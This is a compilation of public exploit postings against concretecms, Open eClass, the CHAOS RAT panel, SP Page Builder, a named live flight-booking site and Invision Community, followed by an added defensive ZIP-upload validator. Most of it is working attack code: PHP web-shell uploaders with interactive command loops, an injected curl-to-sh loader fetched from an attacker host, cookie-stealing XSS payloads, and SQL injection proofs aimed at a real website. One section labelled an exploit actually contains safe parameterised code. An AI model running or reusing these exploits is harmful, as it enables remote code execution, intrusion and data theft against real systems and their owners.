<pre><code># Exploit Title: Multiple Web Flaws in concretecms v9.2.7<br /># Date: 4/2024<br /># Exploit Author: Andrey Stoykov<br /># Version: 9.2.7<br /># Tested on: Ubuntu 22.04<br /># Blog: http://msecureltd.blogspot.com<br /><br /><br />Verbose Error Message - Stack Trace:<br /><br />1. Browse directly to the edit profile page<br />2. An error page with a verbose stack trace is returned<br /><br />Verbose Error Message - SQL Error:<br /><br />1. Page Settings > Design > Save Changes<br />2. Intercept the HTTP POST request and place a single quote in "pTemplateID"<br />3. A verbose SQL error message is returned<br /><br />Open Redirect:<br /><br />1. Log in to the application<br />2. Click the "Edit This Page" button<br />3. Intercept the HTTP GET request<br />4. Enter the relevant domain as the value of the "redirect" parameter<br /><br />Stored XSS:<br /><br />1. Edit the page<br />2. Add an HTML block and drag it onto the page<br />3. Add the XSS payload:<br /><br />"&gt;&lt;iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="&gt;<br /><br /></code></pre>
<pre><code>import requests<br />import argparse<br />import zipfile<br />import os<br />import sys<br /><br />RED = '\033[91m'<br />GREEN = '\033[92m'<br />YELLOW = '\033[93m'<br />RESET = '\033[0m'<br />ORANGE = '\033[38;5;208m'<br /><br />MALICIOUS_PAYLOAD = """\<br />&lt;?php<br /><br />if(isset($_REQUEST['cmd'])){<br />    $cmd = ($_REQUEST['cmd']);<br />    system($cmd);<br />    die;<br />}<br /><br />?&gt;<br />"""<br /><br />def banner():<br />    print(f'''{RED}<br />{YELLOW}<br /> ============================ Author: Frey ============================<br />{RESET}''')<br /><br />def execute_command(openeclass, filename):<br />    while True:<br />        # Prompt for user input with "eclass"<br />        cmd = input(f"{RED}[{YELLOW}eClass{RED}]~# {RESET}")<br /><br />        # Check if the command is 'quit', then break the loop<br />        if cmd.lower() == "quit":<br />            print(f"{ORANGE}\nExiting...{RESET}")<br />            clean_server(openeclass)<br />            sys.exit()<br /><br />        # Construct the URL with the user-provided command; filename is the uploaded script (evil.php)<br />        url = f"{openeclass}/courses/user_progress_data/cert_templates/{filename}?cmd={cmd}"<br /><br />        # Execute the GET request<br />        try:<br />            response = requests.get(url)<br /><br />            # Check if the request was successful<br />            if response.status_code == 200:<br />                # Print the response text<br />                print(f"{GREEN}{response.text}{RESET}")<br /><br />        except requests.exceptions.RequestException as e:<br />            # Print any error that occurs during the request<br />            print(f"{RED}An error occurred: {e}{RESET}")<br /><br />def upload_web_shell(openeclass, username, password):<br />    login_url = f'{openeclass}/?login_page=1'<br />    login_page_url = f'{openeclass}/main/login_form.php?next=%2Fmain%2Fportfolio.php'<br /><br />    # Login credentials<br />    payload = {<br />        'next': '/main/portfolio.php',<br />        'uname': f'{username}',<br />        'pass': f'{password}',<br />        'submit': 'Enter'<br />    }<br /><br />    headers = {<br />        'Referer': login_page_url,<br />    }<br /><br />    # Use a session to ensure cookies are handled correctly<br />    with requests.Session() as session:<br />        # (Optional) Initially visit the login page if needed to get a fresh session cookie or any other required tokens<br />        session.get(login_page_url)<br /><br />        # Post the login credentials<br />        response = session.post(login_url, headers=headers, data=payload)<br /><br />        # Create a zip file containing the malicious payload<br />        zip_file_path = 'malicious_payload.zip'<br />        with zipfile.ZipFile(zip_file_path, 'w') as zipf:<br />            zipf.writestr('evil.php', MALICIOUS_PAYLOAD.encode())<br /><br />        # Upload the zip file (the handle is closed again before the file is removed below)<br />        url = f'{openeclass}/modules/admin/certbadge.php?action=add_cert'<br />        with open(zip_file_path, 'rb') as zip_handle:<br />            files = {<br />                'filename': ('evil.zip', zip_handle, 'application/zip'),<br />                'certhtmlfile': (None, ''),<br />                'orientation': (None, 'L'),<br />                'description': (None, ''),<br />                'cert_id': (None, ''),<br />                'submit_cert_template': (None, '')<br />            }<br />            response = session.post(url, files=files)<br /><br />        # Clean up the zip file<br />        os.remove(zip_file_path)<br /><br />        # Check if the upload was successful<br />        if response.status_code == 200:<br />            print(f"{GREEN}Payload uploaded successfully!{RESET}")<br />            return True<br />        else:<br />            print(f"{RED}Failed to upload payload. Exiting...{RESET}")<br />            return False<br /><br />def clean_server(openeclass):<br />    print(f"{ORANGE}Cleaning server...{RESET}")<br />    # Remove the uploaded files<br />    requests.get(f"{openeclass}/courses/user_progress_data/cert_templates/evil.php?cmd=rm%20evil.zip")<br />    requests.get(f"{openeclass}/courses/user_progress_data/cert_templates/evil.php?cmd=rm%20evil.php")<br />    print(f"{GREEN}Server cleaned successfully!{RESET}")<br /><br />def main():<br />    parser = argparse.ArgumentParser(description="Open eClass – CVE-2024-31777: Unrestricted File Upload Leads to Remote Code Execution")<br />    parser.add_argument('-u', '--username', required=True, help="Username for login")<br />    parser.add_argument('-p', '--password', required=True, help="Password for login")<br />    parser.add_argument('-e', '--eclass', required=True, help="Base URL of the Open eClass")<br />    args = parser.parse_args()<br /><br />    banner()<br />    # Running the main login and execute command function<br />    if upload_web_shell(args.eclass, args.username, args.password):<br />        execute_command(args.eclass, 'evil.php')<br /><br />if __name__ == "__main__":<br />    main()<br /></code></pre>
<pre><code># Exploit Title: CHAOS RAT v5.0.1 RCE<br /># Date: 2024-04-05<br /># Exploit Author: @_chebuya<br /># Software Link: https://github.com/tiagorlampert/CHAOS<br /># Version: v5.0.1<br /># Tested on: Ubuntu 20.04 LTS<br /># CVE: CVE-2024-30850, CVE-2024-31839<br /># Description: The CHAOS RAT web panel is vulnerable to command injection, which can be triggered from an XSS, allowing an attacker to take over the RAT server<br /># Github: https://github.com/chebuya/CVE-2024-30850-chaos-rat-rce-poc<br /># Blog: https://blog.chebuya.com/posts/remote-code-execution-on-chaos-rat-via-spoofed-agents/<br />import time<br />import requests<br />import threading<br />import json<br />import websocket<br />import http.client<br />import argparse<br />import sys<br />import re<br /><br />from functools import partial<br />from http.server import BaseHTTPRequestHandler, HTTPServer<br /><br />class Collector(BaseHTTPRequestHandler):<br />    def __init__(self, ip, port, target, command, video_name, *args, **kwargs):<br />        self.ip = ip<br />        self.port = port<br />        self.target = target<br />        self.shell_command = command<br />        self.video_name = video_name<br />        super().__init__(*args, **kwargs)<br /><br />    def do_GET(self):<br />        if self.path == "/loader.sh":<br />            # Serve the shell command that the injected curl|sh pipeline fetches<br />            self.send_response(200)<br />            self.end_headers()<br />            command = str.encode(self.shell_command)<br />            self.wfile.write(command)<br />        elif self.path == "/video.mp4":<br />            with open(self.video_name, 'rb') as f:<br />                self.send_response(200)<br />                self.send_header('Content-type', 'video/mp4')<br />                self.end_headers()<br />                self.wfile.write(f.read())<br />        else:<br />            # Any other path is the XSS callback carrying the admin's cookie<br />            cookie = self.path.split("=")[1]<br />            self.send_response(200)<br />            self.end_headers()<br />            self.wfile.write(b"")<br /><br />            background_thread = threading.Thread(target=run_exploit, args=(cookie, self.target, self.ip, self.port))<br />            background_thread.start()<br /><br />def convert_to_int_array(string):<br />    int_array = []<br />    for char in string:<br />        int_array.append(ord(char))<br />    return int_array<br /><br />def extract_client_info(path):<br />    # Pull server address, port and JWT out of a compiled CHAOS client binary<br />    with open(path, 'rb') as f:<br />        data = str(f.read())<br /><br />    address_regexp = r"main\.ServerAddress=(?:[0-9]{1,3}\.){3}[0-9]{1,3}"<br />    address_pattern = re.compile(address_regexp)<br />    address = address_pattern.findall(data)[0].split("=")[1]<br /><br />    port_regexp = r"main\.Port=\d{1,6}"<br />    port_pattern = re.compile(port_regexp)<br />    port = port_pattern.findall(data)[0].split("=")[1]<br /><br />    jwt_regexp = r"main\.Token=[a-zA-Z0-9_\.\-+/=]*\.[a-zA-Z0-9_\.\-+/=]*\.[a-zA-Z0-9_\.\-+/=]*"<br />    jwt_pattern = re.compile(jwt_regexp)<br />    jwt = jwt_pattern.findall(data)[0].split("=")[1]<br /><br />    return f"{address}:{port}", jwt<br /><br />def keep_connection(target, cookie, hostname, username, os_name, mac, ip):<br /><br />    print("Spoofing agent connection")<br />    headers = {<br />        "Cookie": f"jwt={cookie}"<br />    }<br /><br />    while True:<br />        data = {"hostname": hostname, "username": username, "user_id": username, "os_name": os_name, "os_arch": "amd64", "mac_address": mac, "local_ip_address": ip, "port": "8000", "fetched_unix": int(time.time())}<br />        r = requests.get(f"http://{target}/health", headers=headers)<br />        r = requests.post(f"http://{target}/device", headers=headers, json=data)<br />        time.sleep(30)<br /><br />def handle_command(target, cookie, mac, ip, port):<br />    print("Waiting to serve malicious command output")<br />    headers = {<br />        "Cookie": f"jwt={cookie}",<br />        "X-Client": mac<br />    }<br /><br />    ws = websocket.WebSocket()<br />    ws.connect(f'ws://{target}/client', header=headers)<br />    while True:<br />        response = ws.recv()<br /><br />        command = json.loads(response)['command']<br />        data = {"client_id": mac, "response": convert_to_int_array(f"&lt;/pre&gt;&lt;script&gt;var i = new Image;i.src='http://{ip}:{port}/'+document.cookie;&lt;/script&gt;&lt;video loop controls autoplay&gt;&lt;source src=\"http://{ip}:{port}/video.mp4\" type=\"video/mp4\"&gt;&lt;/video&gt;"), "has_error": False}<br /><br />        ws.send_binary(json.dumps(data))<br /><br /><br />def run_exploit(cookie, target, ip, port):<br />    print(f"Exploiting {target} with JWT {cookie}")<br />    conn = http.client.HTTPConnection(target)<br />    headers = {<br />        'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0',<br />        'Content-Type': 'multipart/form-data; boundary=---------------------------196428912119225031262745068932',<br />        'Cookie': f'jwt={cookie}'<br />    }<br />    conn.request(<br />        'POST',<br />        '/generate',<br />        f'-----------------------------196428912119225031262745068932\r\nContent-Disposition: form-data; name="address"\r\n\r\nhttp://localhost\'$(IFS=];b=curl]{ip}:{port}/loader.sh;$b|sh)\'\r\n-----------------------------196428912119225031262745068932\r\nContent-Disposition: form-data; name="port"\r\n\r\n8080\r\n-----------------------------196428912119225031262745068932\r\nContent-Disposition: form-data; name="os_target"\r\n\r\n1\r\n-----------------------------196428912119225031262745068932\r\nContent-Disposition: form-data; name="filename"\r\n\r\n\r\n-----------------------------196428912119225031262745068932\r\nContent-Disposition: form-data; name="run_hidden"\r\n\r\nfalse\r\n-----------------------------196428912119225031262745068932--\r\n',<br />        headers<br />    )<br /><br />def run(ip, port, target, command, video_name):<br />    server_address = (ip, int(port))<br /><br />    collector = partial(Collector, ip, port, target, command, video_name)<br />    httpd = HTTPServer(server_address, collector)<br />    print(f'Server running on {ip}:{port}')<br />    httpd.serve_forever()<br /><br />if __name__ == "__main__":<br />    parser = argparse.ArgumentParser()<br />    subparsers = parser.add_subparsers(dest="option")<br /><br />    exploit = subparsers.add_parser("exploit")<br />    exploit.add_argument("-f", "--file", help="The path to the CHAOS client")<br />    exploit.add_argument("-t", "--target", help="The url of the CHAOS server (127.0.0.1:8080)")<br />    exploit.add_argument("-c", "--command", help="The command to use", default=r"find / -name chaos.db -exec rm -f {} \;")<br />    exploit.add_argument("-v", "--video-name", help="The video name to use", default="rickroll.mp4")<br />    exploit.add_argument("-j", "--jwt", help="The JWT token to use")<br />    exploit.add_argument("-l", "--local-ip", help="The local IP to use for serving bash script and mp4", required=True)<br />    exploit.add_argument("-p", "--local-port", help="The local port to use for serving bash script and mp4", default=8000)<br />    exploit.add_argument("-H", "--hostname", help="The hostname to use for the spoofed client", default="DC01")<br />    exploit.add_argument("-u", "--username", help="The username to use for the spoofed client", default="Administrator")<br />    exploit.add_argument("-o", "--os", help="The OS to use for the spoofed client", default="Windows")<br />    exploit.add_argument("-m", "--mac", help="The MAC address to use for the spoofed client", default="3f:72:58:91:56:56")<br />    exploit.add_argument("-i", "--ip", help="The IP address to use for the spoofed client", default="10.0.17.12")<br /><br />    extract = subparsers.add_parser("extract")<br />    extract.add_argument("-f", "--file", help="The path to the CHAOS client", required=True)<br /><br />    args = parser.parse_args()<br /><br />    if args.option == "exploit":<br />        if args.target is not None and args.jwt is not None:<br />            target = args.target<br />            jwt = args.jwt<br />        elif args.file is not None:<br />            target, jwt = extract_client_info(args.file)<br />        else:<br />            exploit.print_help(sys.stderr)<br />            sys.exit(1)<br /><br />        bg = threading.Thread(target=keep_connection, args=(target, jwt, args.hostname, args.username, args.os, args.mac, args.ip))<br />        bg.start()<br /><br />        cmd = threading.Thread(target=handle_command, args=(target, jwt, args.mac, args.local_ip, args.local_port))<br />        cmd.start()<br /><br />        server = threading.Thread(target=run, args=(args.local_ip, args.local_port, target, args.command, args.video_name))<br />        server.start()<br /><br />    elif args.option == "extract":<br />        target, jwt = extract_client_info(args.file)<br />        print(f"CHAOS server: {target}\nJWT: {jwt}")<br />    else:<br />        parser.print_help(sys.stderr)<br />        sys.exit(1)<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : SP Page Builder 5.2.7 SQL Injection Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : Windows 10 Français V.(Pro) / browser : Mozilla Firefox 69.0 (32-bit) |<br />| # Vendor : https://extensions.joomla.org/extension/sp-page-builder/ |<br />====================================================================================================================================<br /><br />PoC :<br /><br />[+] Dorking in Google or another search engine.<br /><br />[+] Use payload : /index.php?option=com_sppagebuilder&view=page&id=22&Itemid=251 <===== inject here<br /><br />[+] http://127.0.0.1/cdgi36fr/index.php?option=com_sppagebuilder&view=page&id=22&Itemid=251<br /><br /><br />Greetings to :=================================================================<br />jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |<br />===============================================================================<br /></code></pre>
<pre><code><br />This site has a security problem: an SQL injection vulnerability (CWE-89).<br />We have repeatedly reported this security problem to the site, and our reports have been ignored.<br />We want to record this security issue.<br /> <br />#########################################################################################################################<br /># #<br /># Exploit Title : Site Flight agency airpol the Islamic Republic of Iran SQL INJECTION Vulnerability #<br /># #<br /># Author : E1.Coders #<br /># #<br /># Contact : E1.Coders [at] Mail [dot] RU #<br /># #<br /># Portal Link : https://flightio.com/ #<br /># #<br /># Security Risk : Medium #<br /># #<br /># Description : All targeted Iranian airport websites #<br /># #<br /># DorK : "inurl:wp-comments-post.php%5Eauthor=" #<br /># #<br />#########################################################################################################################<br /># #<br /># Expl0iTs: #<br />#<br /># vuln type : SQLInjection<br /># <br /># refer address : https://flightio.com/blog/attractions/best-chahbahar-attractions/<br /># <br /># request type : POST<br /># <br /># action url : https://flightio.com/blog/wp-comments-post.php^author=6463106&submit=ارسال دیدگاه&comment_post_ID=64505&akismet_comment_nonce=385c7c306e&ak_js=98&comment=WCRTEXTAREATESTINPUT8462957&ak_hp_textarea=WCRTEXTAREATESTINPUT2557057&comment_parent=0<br /># <br /># parameter : comment_parent<br /># <br /># description : POST SQL INJECTION BooleanBased String<br /># <br /># POC : https://flightio.com/blog/wp-comments-post.php^author=6463106&submit=ارسال/**/دیدگاه&comment_post_ID=64505&akismet_comment_nonce=385c7c306e&ak_js=98&comment=WCRTEXTAREATESTINPUT8462957&ak_hp_textarea=WCRTEXTAREATESTINPUT2557057&comment_parent=0%27/**/aNd/**/7462200=7462200/**/aNd/**/%276199%27=%276199<br />---------------------------------------<br />#<br /># Expl0iTs:<br /># vuln type : SQLInjection<br /># <br /># refer address : https://flightio.com/blog/travel-tips/norouz-holiday-trips-in-iran/<br /># <br /># request type : POST<br /># <br /># action url : https://flightio.com/blog/wp-comments-post.php^author=9640811&submit=ارسال دیدگاه&comment_post_ID=3173&comment_parent=0&akismet_comment_nonce=709cdb3e84&ak_js=154&comment=WCRTEXTAREATESTINPUT9791191&ak_hp_textarea=WCRTEXTAREATESTINPUT8111319<br /># <br /># parameter : ak_hp_textarea<br /># <br /># description : POST SQL INJECTION BooleanBased String<br /># <br /># POC : https://flightio.com/blog/wp-comments-post.php^author=9640811&submit=ارسال/**/دیدگاه&comment_post_ID=3173&comment_parent=0&akismet_comment_nonce=709cdb3e84&ak_js=154&comment=WCRTEXTAREATESTINPUT9791191&ak_hp_textarea=WCRTEXTAREATESTINPUT8111319%27)/**/aNd/**/4442431=4442431/**/aNd/**/(%276199%27)=(%276199<br />------------------------------------------------<br /># Expl0iTs:<br /># vuln type : SQLInjection<br /># <br /># refer address : https://flightio.com/blog/travel-tips/hormuz-island-travel-guide/<br /># <br /># request type : POST<br /># <br /># action url : https://flightio.com/blog/wp-comments-post.php^submit=ارسال دیدگاه&comment_post_ID=64267&comment_parent=0&akismet_comment_nonce=57b7866a2c&ak_js=15&comment=WCRTEXTAREATESTINPUT9752286&ak_hp_textarea=WCRTEXTAREATESTINPUT5571116&author=99999999<br /># <br /># parameter : author<br /># <br /># description : POST SQL INJECTION BooleanBased String<br /># <br /># POC : https://flightio.com/blog/wp-comments-post.php^submit=ارسال/**/دیدگاه&comment_post_ID=64267&comment_parent=0&akismet_comment_nonce=57b7866a2c&ak_js=15&comment=WCRTEXTAREATESTINPUT9752286&ak_hp_textarea=WCRTEXTAREATESTINPUT5571116&author=99999999%27)/**/oR/**/6197419=6197419/**/aNd/**/(%276199%27)=(%276199 #<br />#########################################################################################################################<br /># #<br /># | Security Is JOCK | #<br /># #<br /># | Russian Black Hat | #<br /># #<br />#########################################################################################################################<br /> <br /> <br />Exploit PHP :<br /> <br />global $wpdb;<br /> <br />// Request values taken from the third request above<br />$comment_post_ID = 64267;<br />$comment_parent = 0;<br />$akismet_comment_nonce = '57b7866a2c';<br />$ak_js = 15;<br />$author = '99999999';<br />$comment_author = $author;<br />$comment = 'WCRTEXTAREATESTINPUT9752286';<br />$comment_content = $comment;<br />$ak_hp_textarea = 'WCRTEXTAREATESTINPUT5571116';<br /> <br />// Parameterised statement: every value is bound through a format placeholder<br />$sql = $wpdb->prepare(<br />    "INSERT INTO wp_comments (comment_post_ID, comment_author, comment_content, comment_parent, akismet_comment_nonce, ak_js, author) VALUES (%d, %s, %s, %d, %s, %d, %d)",<br />    $comment_post_ID, $comment_author, $comment_content, $comment_parent, $akismet_comment_nonce, $ak_js, $author<br />);<br /> <br />// Equivalent insert through $wpdb->insert(), which escapes each column value itself<br />$wpdb->insert('wp_comments', array(<br />    'comment_post_ID' => $comment_post_ID,<br />    'comment_author' => $comment_author,<br />    'comment_content' => $comment_content,<br />    'comment_parent' => $comment_parent,<br />    'akismet_comment_nonce' => $akismet_comment_nonce,<br />    'ak_js' => $ak_js,<br />    'author' => $author<br />));<br /></code></pre>
<pre><code>------------------------------------------------------------------------------<br />Invision Community <= 4.7.16 (toolbar.php) Remote Code Execution Vulnerability<br />------------------------------------------------------------------------------<br /><br /><br />[-] Software Link:<br /><br />https://invisioncommunity.com<br /><br /><br />[-] Affected Versions:<br /><br />Version 4.7.16 and prior versions.<br /><br /><br />[-] Vulnerability Description:<br /><br />The vulnerability is located in the<br />/applications/core/modules/admin/editor/toolbar.php script. Specifically, in the<br />IPS\core\modules\admin\editor\_toolbar::addPlugin() method, which handles the<br />upload of a ZIP file, trying to extract its content into the<br />/applications/core/interface/ckeditor/ckeditor/plugins/ directory; if the ZIP<br />archive does not include a plugin.js file, then the extracted ZIP content will be<br />recursively deleted from the file system, otherwise it will stay there. This can<br />be exploited to execute arbitrary PHP code by uploading a ZIP archive containing<br />a plugin.js file (which can also be empty) along with a PHP file. Successful<br />exploitation of this vulnerability requires an Administrator account having the<br />"toolbar_manage" permission.<br /><br /><br />[-] Proof of Concept:<br /><br />https://karmainsecurity.com/pocs/CVE-2024-30162.php<br /><br /><br />[-] Solution:<br /><br />No official solution is currently available.<br /><br /><br />[-] Disclosure Timeline:<br /><br />[08/01/2024] - Vulnerability details sent to SSD Secure Disclosure<br />[12/03/2024] - Version 4.7.16 released, but the issue is still not fixed<br />[20/03/2024] - CVE identifier requested<br />[24/03/2024] - CVE identifier assigned<br />[05/04/2024] - Coordinated public disclosure<br /><br /><br />[-] CVE Reference:<br /><br />The Common Vulnerabilities and Exposures project (cve.mitre.org)<br />has assigned the name CVE-2024-30162 to this vulnerability.<br /><br /><br />[-] Credits:<br /><br />Vulnerability discovered by Egidio Romano.<br /><br /><br />[-] Other References:<br /><br />https://ssd-disclosure.com/ssd-advisory-ip-board-nexus-rce-and-blind-sqli/<br /><br /><br />[-] Original Advisory:<br /><br />http://karmainsecurity.com/KIS-2024-03<br /><br /><br />-----------------------<br />PoC:<br /><br />&lt;?php<br /><br />/*<br /> ------------------------------------------------------------------------------<br /> Invision Community <= 4.7.16 (toolbar.php) Remote Code Execution Vulnerability<br /> ------------------------------------------------------------------------------<br /><br /> author..............: Egidio Romano aka EgiX<br /> mail................: n0b0d13s[at]gmail[dot]com<br /> software link.......: https://invisioncommunity.com<br /><br /> +-------------------------------------------------------------------------+<br /> | This proof of concept code was written for educational purpose only. |<br /> | Use it at your own risk. Author will not be responsible for any damage. |<br /> +-------------------------------------------------------------------------+<br /><br /> [-] Vulnerability Description:<br /><br /> The vulnerability is located in the /applications/core/modules/admin/editor/toolbar.php script.<br /> Specifically, in the IPS\core\modules\admin\editor\_toolbar::addPlugin() method, which<br /> handles the upload of a ZIP file, trying to extract its content into the<br /> /applications/core/interface/ckeditor/ckeditor/plugins/ directory; if the ZIP archive does<br /> not include a plugin.js file, then the extracted ZIP content will be recursively deleted<br /> from the file system, otherwise it will stay there. This can be exploited to execute<br /> arbitrary PHP code by uploading a ZIP archive containing a plugin.js file (which can<br /> also be empty) along with a PHP file. Successful exploitation of this vulnerability<br /> requires an Administrator account having the "toolbar_manage" permission.<br /><br /> [-] Original Advisory:<br /><br /> https://karmainsecurity.com/KIS-2024-03<br />*/<br /><br />set_time_limit(0);<br />error_reporting(E_ERROR);<br /><br />if (!extension_loaded("curl")) die("[-] cURL extension required!\n");<br /><br />if ($argc != 4) die("\nUsage: php $argv[0] &lt;URL&gt; &lt;Email&gt; &lt;Password&gt;\n\n");<br /><br />$url = $argv[1];<br />$email = $argv[2];<br />$passwd = $argv[3];<br />$ch = curl_init();<br /><br />@unlink('./cookies.txt');<br /><br />curl_setopt($ch, CURLOPT_HEADER, true);<br />curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);<br />curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);<br />curl_setopt($ch, CURLOPT_COOKIEJAR, './cookies.txt');<br />curl_setopt($ch, CURLOPT_COOKIEFILE, './cookies.txt');<br /><br />print "[+] Logging into AdminCP\n";<br /><br />curl_setopt($ch, CURLOPT_URL, "{$url}admin/?app=core&module=system&controller=login");<br />curl_setopt($ch, CURLOPT_POST, false);<br /><br />if (!preg_match('/csrfKey: "([^"]+)"/i', curl_exec($ch), $csrf)) die("[-] CSRF token not found!\n");<br /><br />curl_setopt($ch, CURLOPT_POSTFIELDS, "csrfKey={$csrf[1]}&auth=".urlencode($email)."&password={$passwd}&_processLogin=usernamepassword");<br /><br />if (!preg_match("/303 See Other/i", curl_exec($ch))) die("[-] Login failed!\n");<br /><br />print "[+] Uploading malicious ZIP file\n";<br /><br />curl_setopt($ch, CURLOPT_URL, "{$url}admin/?app=core&module=editor&controller=toolbar&do=addPlugin");<br />curl_setopt($ch, CURLOPT_POST, false);<br /><br />if (!preg_match('/csrfKey: "([^"]+)"/i', curl_exec($ch), $csrf)) die("[-] CSRF token not found!\n");<br /><br />$plg = md5(time()).".zip";<br /><br />// Base64-encoded ZIP containing an empty plugin.js and an index.php stub<br />@file_put_contents("rce.zip", base64_decode("UEsDBAoDAAAAADxvKFgecSjnMgAAADIAAAAJAAAAaW5kZXgucGhwPD9waHAgZXZhbChiYXNlNjRfZGVjb2RlKCRfU0VSVkVSWydIVFRQX0MnXSkpOyA/PgpQSwMECgMAAAAAQG8oWAAAAAAAAAAAAAAAAAkAAABwbHVnaW4uanNQSwECPwMKAwAAAAA8byhYHnEo5zIAAAAyAAAACQAkAAAAAAAAACCAtIEAAAAAaW5kZXgucGhwCgAgAAAAAAABABgAgMvlSzJC2gGAy+VLMkLaAYDL5UsyQtoBUEsBAj8DCgMAAAAAQG8oWAAAAAAAAAAAAAAAAAkAJAAAAAAAAAAggLSBWQAAAHBsdWdpbi5qcwoAIAAAAAAAAQAYAAC84E4yQtoBALzgTjJC2gEAvOBOMkLaAVBLBQYAAAAAAgACALYAAACAAAAAAAA="));<br /><br />$params = ["csrfKey" => $csrf[1], "form_submitted" => 1, "editor_plugin_zip_noscript[]" => new CURLFile("rce.zip", "", $plg)];<br /><br />curl_setopt($ch, CURLOPT_POSTFIELDS, $params);<br /><br />if (!preg_match("/301 Moved Permanently/i", curl_exec($ch))) die("[-] Upload failed!\n");<br /><br />print "[+] Launching shell\n";<br /><br />curl_setopt($ch, CURLOPT_URL, "{$url}applications/core/interface/ckeditor/ckeditor/plugins/{$plg}/");<br />curl_setopt($ch, CURLOPT_POST, false);<br /><br />$phpcode = "print '____'; passthru(base64_decode('%s')); print '____';";<br /><br />while(1)<br />{<br />    print "\ninvision-shell# ";<br />    if (($cmd = trim(fgets(STDIN))) == "exit") break;<br />    curl_setopt($ch, CURLOPT_HTTPHEADER, ["C: ".base64_encode(sprintf($phpcode, base64_encode($cmd)))]);<br />    preg_match('/____(.*)____/s', curl_exec($ch), $m) ? print $m[1] : die("\n[-] Exploit failed!\n");<br />}<br /><br /></code></pre>
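Both the Open eClass certificate-template upload and the Invision Community addPlugin() handler above share one design flaw: the archive is written into a web-served directory first and only then checked (or cleaned up), so a PHP file inside it is reachable from the outside in the meantime. The following is an added example, not code from either project, of the opposite order: inspect every entry of the ZIP central directory and refuse the whole archive before a single byte is extracted. The class name, the extension allowlist and the rule that a plugin must ship a `plugin.js` are assumptions modelled on a CKEditor-style plugin; the sample archives are constructed in the temp directory for the demonstration only.

```php
<?php
// Added example (not Invision Community's or Open eClass's code): validate an uploaded
// plugin/template ZIP before extraction instead of extracting first and cleaning up later.
// The allowlist and the plugin.js requirement are assumptions; adapt them per application.

declare(strict_types=1);

final class PluginZipValidator
{
    /** File types a static editor plugin legitimately contains (assumed allowlist). */
    private const ALLOWED_EXTENSIONS = ['js', 'css', 'json', 'png', 'gif', 'svg', 'html', 'md', 'txt'];

    /** Name segments that a PHP-enabled web server may execute, wherever they appear in the name. */
    private const SERVER_SIDE_SEGMENTS = ['php', 'php3', 'php4', 'php5', 'php7', 'phtml', 'phar', 'phps'];

    /** Returns [] if the archive may be extracted, otherwise the reasons to reject it. Extracts nothing. */
    public static function problems(string $zipPath): array
    {
        $zip = new ZipArchive();
        if ($zip->open($zipPath) !== true) {
            return ['archive cannot be opened'];
        }

        $problems = [];
        $hasPluginJs = false;

        for ($i = 0; $i < $zip->numFiles; $i++) {
            $name = $zip->getNameIndex($i);
            if ($name === false || $name === '') {
                $problems[] = "entry {$i}: unreadable name";
                continue;
            }

            // Zip-slip: absolute paths, backslashes and ".." segments must never reach extractTo().
            $segments = explode('/', str_replace('\\', '/', $name));
            if ($name[0] === '/' || strpos($name, '\\') !== false || in_array('..', $segments, true)) {
                $problems[] = "{$name}: path traversal";
                continue;
            }

            // Directory entries end with "/" and carry no extension to check.
            if (substr($name, -1) === '/') {
                continue;
            }

            $base = strtolower(basename($name));

            // Check every dotted segment, so "shell.php.js" is caught even though its last
            // extension ("js") is allowed; an AddHandler-style server config would still run it.
            foreach (array_slice(explode('.', $base), 1) as $segment) {
                if (in_array($segment, self::SERVER_SIDE_SEGMENTS, true)) {
                    $problems[] = "{$name}: server-side script";
                    continue 2;
                }
            }

            $ext = pathinfo($base, PATHINFO_EXTENSION);
            if (!in_array($ext, self::ALLOWED_EXTENSIONS, true)) {
                $problems[] = "{$name}: file type '{$ext}' not allowed";
            }

            // A plugin must ship plugin.js at the top level or inside a single plugin folder.
            if ($name === 'plugin.js' || preg_match('#^[^/]+/plugin\.js$#', $name) === 1) {
                $hasPluginJs = true;
            }
        }
        $zip->close();

        if (!$hasPluginJs) {
            $problems[] = 'plugin.js missing';
        }
        return $problems;
    }
}

// Constructed sample archives, written to the temp dir for this demonstration only.
function makeZip(string $path, array $entries): void
{
    $zip = new ZipArchive();
    $zip->open($path, ZipArchive::CREATE | ZipArchive::OVERWRITE);
    foreach ($entries as $entryName => $content) {
        $zip->addFromString($entryName, $content);
    }
    $zip->close();
}

$tmp = sys_get_temp_dir();
// Same shape as the archives in the advisories above: an empty plugin.js next to a PHP file.
makeZip("{$tmp}/bad-plugin.zip", ['plugin.js' => '', 'index.php' => '/* placeholder */']);
// A benign plugin: script, stylesheet and an icon inside one folder.
makeZip("{$tmp}/good-plugin.zip", ['myplugin/plugin.js' => '/* js */', 'myplugin/styles.css' => 'a{}', 'myplugin/icons/i.png' => 'PNG']);
// Zip-slip and double-extension attempts.
makeZip("{$tmp}/tricky.zip", ['plugin.js' => '', '../../evil.js' => '', 'shell.php.js' => '']);

foreach (['bad-plugin', 'good-plugin', 'tricky'] as $case) {
    $problems = PluginZipValidator::problems("{$tmp}/{$case}.zip");
    printf("%-12s %s\n", $case, $problems === [] ? 'OK to extract' : 'REJECT: ' . implode('; ', $problems));
    unlink("{$tmp}/{$case}.zip");
}
```

Run with `php validator.php`: the first and third archives are rejected (server-side script, path traversal) and only the second is cleared for extraction. Validating before extraction also removes the race that the delete-afterwards design leaves open, and every rejection is a clean log line for the admin audit trail.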
